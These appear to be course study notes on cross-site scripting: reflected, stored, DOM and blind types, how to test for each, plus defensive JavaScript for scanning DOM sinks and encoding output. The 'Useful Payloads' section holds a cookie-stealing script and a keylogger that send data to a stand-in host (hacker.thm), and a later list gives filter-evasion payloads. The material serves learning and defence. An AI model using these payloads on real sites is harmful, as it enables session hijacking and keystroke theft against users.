
Cross-Site Scripting (XSS)

Introduction

  • Cross-Site Scripting (XSS) is an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users.

Useful Payloads

  • To display a basic alert box.
    <script>alert('XSS');</script>
  • To steal the user's cookie.
    <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
  • To steal keystrokes by acting as a keylogger.
    <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
  • To call a JavaScript function.
    <script>user.changeEmail('attacker@hacker.thm');</script>

Types of XSS

  • There are four different types of XSS:
    • Reflected XSS
    • Stored XSS
    • DOM XSS
    • Blind XSS

Reflected XSS

  • Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation.

Impact

  • The attacker could send links containing a JavaScript payload to potential victims, or embed them in an iframe on another website, getting the victims to execute code in their browser and potentially revealing session or customer information.

Test For Reflected XSS

  • Test the areas where the user input is reflected back. Examples include
    • Parameters in the URL Query String
    • URL File Path
    • Sometimes HTTP Headers (although unlikely exploitable in practice)

Stored XSS

  • In Stored XSS, the payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page.

Impact

  • Stored XSS is more dangerous than Reflected XSS.
  • It executes for any user who visits the infected web page, without the attacker having to send anything to the victim.
  • Stored XSS can redirect users to another site, steal the user's session cookie, or perform other website actions while acting as the visiting user.

Test For Stored XSS

  • Test for areas where the data is stored and then shown back to other users. Examples include
    • Comments on a blog
    • User profile information
    • Website Listings

DOM Based XSS

  • DOM stands for Document Object Model
  • DOM is the programming interface for HTML and XML documents.
  • DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code.

Impact

  • Crafted links could be sent to potential victims, redirecting them to another website or stealing content from the page or the user's session.

Test For DOM Based XSS

  • Look for parts of the code that access certain variables that an attacker can have control over, such as window.location.x parameters.
  • Look for unsafe JavaScript methods called sinks such as eval().
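The two checks above can be mechanised for a first triage pass. As an added example, not from the original notes, here is a small JavaScript scanner that flags lines where a URL-derived source (location.hash, location.search, document.URL, ...) reaches a sink such as innerHTML or eval(), with one step of taint propagation through simple variable declarations. The function names and the sample source it scans are constructed for this page.

```javascript
// Added example, not part of the original notes: a small static scanner that
// flags candidate DOM XSS flows in JavaScript source. URL-derived values are
// sources, a fixed set of markup/code-executing calls are sinks, and taint is
// propagated through `const/let/var x = <source>` declarations in one pass.
// Function names and the sample code below are constructed for this page.

const DOM_SOURCES = [
  /\blocation\.(hash|search|href|pathname)\b/,
  /\bdocument\.(URL|documentURI|referrer)\b/,
  /\bwindow\.name\b/,
];

const DOM_SINKS = [
  { name: "innerHTML", re: /\.innerHTML\s*=/ },
  { name: "outerHTML", re: /\.outerHTML\s*=/ },
  { name: "insertAdjacentHTML", re: /\.insertAdjacentHTML\s*\(/ },
  { name: "document.write", re: /\bdocument\.write(ln)?\s*\(/ },
  { name: "eval", re: /\beval\s*\(/ },
  { name: "setTimeout(string)", re: /\bsetTimeout\s*\(\s*["'`]/ },
];

// Returns findings of the form { line, sink, text } for every line where a
// source (or a variable previously assigned from one) reaches a sink.
function scanForDomXss(jsText) {
  const findings = [];
  const tainted = new Set(); // identifiers assigned from a source earlier on
  jsText.split("\n").forEach((text, i) => {
    const hasSource =
      DOM_SOURCES.some((re) => re.test(text)) ||
      [...tainted].some((id) => new RegExp(`\\b${id}\\b`).test(text));
    // Propagate taint through simple declarations: const name = location.hash...
    const decl = text.match(/^\s*(?:const|let|var)\s+(\w+)\s*=/);
    if (decl && hasSource) tainted.add(decl[1]);
    const sink = DOM_SINKS.find((s) => s.re.test(text));
    if (hasSource && sink) {
      findings.push({ line: i + 1, sink: sink.name, text: text.trim() });
    }
  });
  return findings;
}

// Constructed sample: one benign textContent write (line 3); the others are
// the patterns the notes above tell you to look for.
const SAMPLE_JS = [
  "const name = decodeURIComponent(location.hash.slice(1));",
  "document.getElementById('greet').innerHTML = 'Hi ' + location.search;",
  "document.getElementById('greet').textContent = name;",
  "eval(new URLSearchParams(location.search).get('cb'));",
  "document.write('<p>' + document.URL + '</p>');",
  "document.getElementById('out').innerHTML = name;",
].join("\n");

console.log(JSON.stringify(scanForDomXss(SAMPLE_JS), null, 2));
```

Run it with node. Same-line matching plus one-step taint propagation is a triage heuristic, not a taint analysis: flows through function calls, object properties or separate files are missed, and every reported line still needs a manual look. The textContent line is deliberately not reported, because writing URL-derived data through a text-only DOM API instead of a markup sink is the fix these findings point toward.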

Blind XSS

  • Blind XSS is similar to Stored XSS, but the result of the execution is not visible to the attacker in the browser.

Impact

  • Using the correct payload, the attacker's JavaScript could make calls back to an attacker's website, revealing the staff portal URL, the staff member's cookies, and even the contents of the portal page that is being viewed.

Test For Blind XSS

  • When testing for Blind XSS vulnerabilities, you need to ensure your payload has a callback (usually an HTTP request). This way, you know if and when your code is being executed.
  • A popular tool for Blind XSS attacks is XSS Hunter Express (https://github.com/mandatoryprogrammer/xsshunter-express).

XSS Payloads

  1. <script>alert('XSS');</script>
  2. "><script>alert('XSS');</script>
  3. </textarea><script>alert('XSS');</script>
  4. ';alert('XSS');//
  5. <sscriptcript>alert('XSS');</sscriptcript>
  6. /images/cat.jpg" onload="alert('XSS');
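Each payload in this list targets a particular output context: 1, 2, 3 and 5 break out into the HTML body, 6 closes a quoted attribute and adds an event handler, and 4 breaks out of a JavaScript string. The defence is to encode for the context the data lands in. As an added example, not from the original notes, the block below implements an encoder per context and contrasts it with the naive filter that strips the word "script" once, which payload 5 (the nested `<sscriptcript>` tag) is designed to survive. Function names and the PAYLOADS array are constructed for this page.

```javascript
// Added example, not part of the original notes: context-aware output
// encoding, the primary defence against the payloads listed above, next to
// the naive "strip the word script" filter that payload 5 is built to defeat.
// Function names are constructed; PAYLOADS holds the six strings from the list.

// HTML body context, e.g. <p>USER_DATA</p>.
function encodeForHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// HTML attribute context, e.g. <img src="USER_DATA">. Everything that is not
// alphanumeric becomes a numeric entity, so the value can neither close the
// quoted attribute nor add a new one (payload 6). The attribute must be quoted.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^a-zA-Z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// JavaScript string context, e.g. var x = 'USER_DATA';. Non-alphanumerics
// become \xHH / \uHHHH escapes, so quotes (payload 4) and "</script>" cannot
// terminate the string or the surrounding script block.
function encodeForJsString(s) {
  return String(s).replace(/[^a-zA-Z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? `\\x${code.toString(16).padStart(2, "0")}`
      : `\\u${code.toString(16).padStart(4, "0")}`;
  });
}

// The weak filter: removes the literal word "script" in a single pass. On
// "<sscriptcript>" the leftovers reassemble into "<script>", which is why
// payload 5 works against it.
function naiveStripScript(s) {
  return s.replace(/script/gi, "");
}

// For the two HTML contexts, a value is neutralised when no raw character that
// could close a tag, a text node or a quoted attribute survives encoding.
function isNeutralisedForHtml(encoded) {
  return !/[<>"']/.test(encoded);
}

// Constructed copy of the six payloads in the list above.
const PAYLOADS = [
  "<script>alert('XSS');</script>",
  "\"><script>alert('XSS');</script>",
  "</textarea><script>alert('XSS');</script>",
  "';alert('XSS');//",
  "<sscriptcript>alert('XSS');</sscriptcript>",
  "/images/cat.jpg\" onload=\"alert('XSS');",
];

// Runs every payload through each defence and reports per-context results.
function checkAllPayloads() {
  return PAYLOADS.map((p, i) => ({
    payload: i + 1,
    htmlBody: isNeutralisedForHtml(encodeForHtml(p)),
    attribute: isNeutralisedForHtml(encodeForHtmlAttribute(p)),
    naiveFilter: isNeutralisedForHtml(naiveStripScript(p)),
  }));
}

console.table(checkAllPayloads());
```

Run with node to see the table: every payload is neutralised by the encoder for its context and none by the blocklist filter. In a real application you would use your templating engine's auto-escaping or a maintained encoding library rather than hand-rolled functions, and pick the encoder by where the value is written, not by what the value looks like. Server-side encoding does nothing for DOM Based XSS, where the browser-side script itself writes URL data into a markup sink; that case needs a text-only API such as textContent on the client.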